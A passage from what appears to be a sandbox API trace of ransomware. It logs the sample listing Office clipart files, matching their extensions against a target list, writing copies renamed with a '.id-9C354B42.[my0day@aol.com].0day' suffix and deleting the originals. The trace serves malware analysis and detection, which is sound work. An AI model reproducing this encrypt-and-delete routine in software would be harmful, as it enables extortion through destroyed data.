Office\\CLIPART\\PUB60COR\\DD00419_.WMF") returned 63 [0273.084] lstrlenW (lpString=".dbf") returned 4 [0273.084] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.084] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00419_.WMF") returned 63 [0273.084] lstrlenW (lpString=".1cd") returned 4 [0273.084] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.084] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00419_.WMF") returned 63 [0273.084] lstrlenW (lpString=".jpg") returned 4 [0273.084] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0273.084] lstrcmpiW (lpString1=".WMF", lpString2=".0day") returned 1 [0273.084] lstrlenW (lpString="DD00437_.WMF") returned 12 [0273.084] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00437_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00437_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0273.084] GetFileSizeEx (in: hFile=0x394, lpFileSize=0x2faff1c | out: lpFileSize=0x2faff1c*=1932) returned 1 [0273.084] CloseHandle (hObject=0x394) returned 1 [0273.084] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00437_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00437_.wmf")) returned 0x20 [0273.084] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00437_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00437_.wmf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0273.084] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00437_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00437_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x394 [0273.085] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fafec8 | out: lpNewFilePointer=0x0) returned 1 [0273.085] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fafec8 | out: lpNewFilePointer=0x0) returned 1 [0273.085] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00437_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00437_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0273.085] GetLastError () returned 0x0 [0273.085] ReadFile (in: hFile=0x394, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fafed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2fafed4*=0x78c, lpOverlapped=0x0) returned 1 [0273.129] WriteFile (in: hFile=0x380, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0x790, lpNumberOfBytesWritten=0x2fafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2fafc9c*=0x790, lpOverlapped=0x0) returned 1 [0273.130] ReadFile (in: hFile=0x394, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fafed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2fafed4*=0x0, lpOverlapped=0x0) returned 1 [0273.130] WriteFile (in: hFile=0x380, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2fafc9c*=0xec, lpOverlapped=0x0) returned 1 [0273.130] SetEndOfFile (hFile=0x380) returned 1 [0273.130] CloseHandle (hObject=0x380) returned 1 [0273.130] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fafec8 | out: lpNewFilePointer=0x0) returned 1 [0273.130] SetEndOfFile (hFile=0x394) returned 1 [0273.132] CloseHandle (hObject=0x394) returned 1 [0273.132] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00437_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0273.140] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00437_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00437_.wmf")) returned 1 [0273.168] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00437_.WMF") returned 63 [0273.168] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00437_.WMF") returned 63 [0273.168] lstrlenW (lpString=".doc") returned 4 [0273.168] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.168] lstrlenW (lpString=".docx") returned 5 [0273.168] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0273.168] lstrlenW (lpString=".pdf") returned 4 [0273.168] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.168] lstrlenW (lpString=".xls") returned 4 [0273.168] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.168] lstrlenW (lpString=".xlsx") returned 5 [0273.169] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0273.169] lstrlenW (lpString=".ppt") returned 4 [0273.169] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.169] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00437_.WMF") returned 63 [0273.169] lstrlenW (lpString=".zip") returned 4 [0273.169] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.169] lstrlenW (lpString=".rar") returned 4 [0273.169] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.169] lstrlenW (lpString=".bz2") returned 4 [0273.169] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.169] lstrlenW (lpString=".7z") returned 3 [0273.169] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.169] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00437_.WMF") returned 63 [0273.169] lstrlenW (lpString=".dbf") returned 4 [0273.169] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.169] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00437_.WMF") returned 63 [0273.169] lstrlenW (lpString=".1cd") returned 4 [0273.169] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.169] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00437_.WMF") returned 63 [0273.169] lstrlenW (lpString=".jpg") returned 4 [0273.169] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0273.169] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00437_.WMF") returned 63 [0273.169] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00437_.WMF") returned 63 [0273.169] lstrlenW (lpString=".doc") returned 4 [0273.169] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.169] lstrlenW (lpString=".docx") returned 5 [0273.169] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0273.169] lstrlenW (lpString=".pdf") returned 4 [0273.169] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.169] lstrlenW (lpString=".xls") returned 4 [0273.169] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.169] lstrlenW (lpString=".xlsx") returned 5 [0273.169] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0273.169] lstrlenW (lpString=".ppt") returned 4 [0273.169] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.169] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00437_.WMF") returned 63 [0273.170] lstrlenW (lpString=".zip") returned 4 [0273.170] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.170] lstrlenW (lpString=".rar") returned 4 [0273.170] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.170] lstrlenW (lpString=".bz2") returned 4 [0273.170] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.170] lstrlenW (lpString=".7z") returned 3 [0273.170] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.170] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00437_.WMF") returned 63 [0273.170] lstrlenW (lpString=".dbf") returned 4 [0273.170] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.170] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00437_.WMF") returned 63 [0273.170] lstrlenW (lpString=".1cd") returned 4 [0273.170] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.170] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00437_.WMF") returned 63 [0273.170] lstrlenW (lpString=".jpg") returned 4 [0273.170] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0273.170] lstrcmpiW (lpString1=".WMF", lpString2=".0day") returned 1 [0273.170] lstrlenW (lpString="DD01039_.WMF") returned 12 [0273.170] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01039_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01039_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0273.171] GetFileSizeEx (in: hFile=0x39c, lpFileSize=0x2faff1c | out: lpFileSize=0x2faff1c*=14820) returned 1 [0273.171] CloseHandle (hObject=0x39c) returned 1 [0273.171] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01039_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01039_.wmf")) returned 0x20 [0273.171] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01039_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01039_.wmf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0273.171] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01039_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01039_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0273.171] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fafec8 | out: lpNewFilePointer=0x0) returned 1 [0273.171] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fafec8 | out: lpNewFilePointer=0x0) returned 1 [0273.171] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01039_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01039_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0273.172] GetLastError () returned 0x0 [0273.172] ReadFile (in: hFile=0x39c, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fafed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2fafed4*=0x39e4, lpOverlapped=0x0) returned 1 [0273.589] WriteFile (in: hFile=0x384, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0x39f0, lpNumberOfBytesWritten=0x2fafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2fafc9c*=0x39f0, lpOverlapped=0x0) returned 1 [0273.598] ReadFile (in: hFile=0x39c, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fafed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2fafed4*=0x0, lpOverlapped=0x0) returned 1 [0273.598] WriteFile (in: hFile=0x384, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2fafc9c*=0xec, lpOverlapped=0x0) returned 1 [0273.598] SetEndOfFile (hFile=0x384) returned 1 [0273.598] CloseHandle (hObject=0x384) returned 1 [0273.598] SetFilePointerEx (in: hFile=0x39c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fafec8 | out: lpNewFilePointer=0x0) returned 1 [0273.598] SetEndOfFile (hFile=0x39c) returned 1 [0273.601] CloseHandle (hObject=0x39c) returned 1 [0273.601] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01039_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0273.627] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01039_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01039_.wmf")) returned 1 [0273.635] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01039_.WMF") returned 63 [0273.644] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01039_.WMF") returned 63 [0273.644] lstrlenW (lpString=".doc") returned 4 [0273.644] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.644] lstrlenW (lpString=".docx") returned 5 [0273.644] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0273.644] lstrlenW (lpString=".pdf") returned 4 [0273.644] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.655] lstrlenW (lpString=".xls") returned 4 [0273.655] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.655] lstrlenW (lpString=".xlsx") returned 5 [0273.655] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0273.655] lstrlenW (lpString=".ppt") returned 4 [0273.655] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.656] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01039_.WMF") returned 63 [0273.656] lstrlenW (lpString=".zip") returned 4 [0273.656] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.662] lstrlenW (lpString=".rar") returned 4 [0273.662] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.662] lstrlenW (lpString=".bz2") returned 4 [0273.662] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.663] lstrlenW (lpString=".7z") returned 3 [0273.663] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.663] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01039_.WMF") returned 63 [0273.663] lstrlenW (lpString=".dbf") returned 4 [0273.663] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.663] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01039_.WMF") returned 63 [0273.663] lstrlenW (lpString=".1cd") returned 4 [0273.663] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.663] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01039_.WMF") returned 63 [0273.663] lstrlenW (lpString=".jpg") returned 4 [0273.663] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0273.663] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01039_.WMF") returned 63 [0273.663] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01039_.WMF") returned 63 [0273.663] lstrlenW (lpString=".doc") returned 4 [0273.663] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0273.663] lstrlenW (lpString=".docx") returned 5 [0273.663] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0273.663] lstrlenW (lpString=".pdf") returned 4 [0273.663] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0273.663] lstrlenW (lpString=".xls") returned 4 [0273.663] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0273.663] lstrlenW (lpString=".xlsx") returned 5 [0273.663] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0273.663] lstrlenW (lpString=".ppt") returned 4 [0273.663] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0273.663] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01039_.WMF") returned 63 [0273.663] lstrlenW (lpString=".zip") returned 4 [0273.663] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0273.663] lstrlenW (lpString=".rar") returned 4 [0273.663] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0273.663] lstrlenW (lpString=".bz2") returned 4 [0273.663] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0273.663] lstrlenW (lpString=".7z") returned 3 [0273.663] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0273.663] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01039_.WMF") returned 63 [0273.664] lstrlenW (lpString=".dbf") returned 4 [0273.664] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0273.664] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01039_.WMF") returned 63 [0273.664] lstrlenW (lpString=".1cd") returned 4 [0273.664] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0273.664] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01039_.WMF") returned 63 [0273.664] lstrlenW (lpString=".jpg") returned 4 [0273.664] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0273.664] lstrcmpiW (lpString1=".WMF", lpString2=".0day") returned 1 [0273.664] lstrlenW (lpString="DD01160_.WMF") returned 12 [0273.664] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01160_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01160_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x318 [0274.154] GetFileSizeEx (in: hFile=0x318, lpFileSize=0x2faff1c | out: lpFileSize=0x2faff1c*=2228) returned 1 [0274.154] CloseHandle (hObject=0x318) returned 1 [0274.154] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01160_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01160_.wmf")) returned 0x20 [0274.233] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01160_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01160_.wmf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0274.233] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01160_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01160_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2cc [0274.236] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fafec8 | out: lpNewFilePointer=0x0) returned 1 [0274.236] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fafec8 | out: lpNewFilePointer=0x0) returned 1 [0274.236] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01160_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01160_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0274.237] GetLastError () returned 0x0 [0274.237] ReadFile (in: hFile=0x2cc, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fafed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2fafed4*=0x8b4, lpOverlapped=0x0) returned 1 [0274.278] WriteFile (in: hFile=0x384, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0x8c0, lpNumberOfBytesWritten=0x2fafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2fafc9c*=0x8c0, lpOverlapped=0x0) returned 1 [0274.279] ReadFile (in: hFile=0x2cc, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fafed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2fafed4*=0x0, lpOverlapped=0x0) returned 1 [0274.279] WriteFile (in: hFile=0x384, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2fafc9c*=0xec, lpOverlapped=0x0) returned 1 [0274.279] SetEndOfFile (hFile=0x384) returned 1 [0274.281] CloseHandle (hObject=0x384) returned 1 [0274.281] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fafec8 | out: lpNewFilePointer=0x0) returned 1 [0274.281] SetEndOfFile (hFile=0x2cc) returned 1 [0274.283] CloseHandle (hObject=0x2cc) returned 1 [0274.283] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01160_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0274.586] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01160_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01160_.wmf")) returned 1 [0274.624] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01160_.WMF") returned 63 [0274.624] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01160_.WMF") returned 63 [0274.624] lstrlenW (lpString=".doc") returned 4 [0274.624] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0274.624] lstrlenW (lpString=".docx") returned 5 [0274.624] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0274.624] lstrlenW (lpString=".pdf") returned 4 [0274.624] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0274.624] lstrlenW (lpString=".xls") returned 4 [0274.624] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0274.624] lstrlenW (lpString=".xlsx") returned 5 [0274.624] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0274.624] lstrlenW (lpString=".ppt") returned 4 [0274.624] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0274.624] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01160_.WMF") returned 63 [0274.624] lstrlenW (lpString=".zip") returned 4 [0274.624] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0274.624] lstrlenW (lpString=".rar") returned 4 [0274.624] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0274.624] lstrlenW (lpString=".bz2") returned 4 [0274.624] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0274.624] lstrlenW (lpString=".7z") returned 3 [0274.624] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0274.624] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01160_.WMF") returned 63 [0274.624] lstrlenW (lpString=".dbf") returned 4 [0274.624] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0274.624] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01160_.WMF") returned 63 [0274.624] lstrlenW (lpString=".1cd") returned 4 [0274.624] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0274.625] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01160_.WMF") returned 63 [0274.625] lstrlenW (lpString=".jpg") returned 4 [0274.625] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0274.625] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01160_.WMF") returned 63 [0274.625] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01160_.WMF") returned 63 [0274.625] lstrlenW (lpString=".doc") returned 4 [0274.625] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0274.625] lstrlenW (lpString=".docx") returned 5 [0274.625] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0274.625] lstrlenW (lpString=".pdf") returned 4 [0274.625] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0274.625] lstrlenW (lpString=".xls") returned 4 [0274.625] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0274.625] lstrlenW (lpString=".xlsx") returned 5 [0274.625] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0274.625] lstrlenW (lpString=".ppt") returned 4 [0274.625] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0274.625] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01160_.WMF") returned 63 [0274.625] lstrlenW (lpString=".zip") returned 4 [0274.625] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0274.625] lstrlenW (lpString=".rar") returned 4 [0274.625] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0274.625] lstrlenW (lpString=".bz2") returned 4 [0274.625] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0274.625] lstrlenW (lpString=".7z") returned 3 [0274.625] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0274.625] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01160_.WMF") returned 63 [0274.625] lstrlenW (lpString=".dbf") returned 4 [0274.625] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0274.625] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01160_.WMF") returned 63 [0274.625] lstrlenW (lpString=".1cd") returned 4 [0274.625] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0274.625] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01160_.WMF") returned 63 [0274.625] lstrlenW (lpString=".jpg") returned 4 [0274.626] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0274.626] lstrcmpiW (lpString1=".WMF", lpString2=".0day") returned 1 [0274.626] lstrlenW (lpString="DD01171_.WMF") returned 12 [0274.626] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01171_.WMF" (normalized: "c:\\program 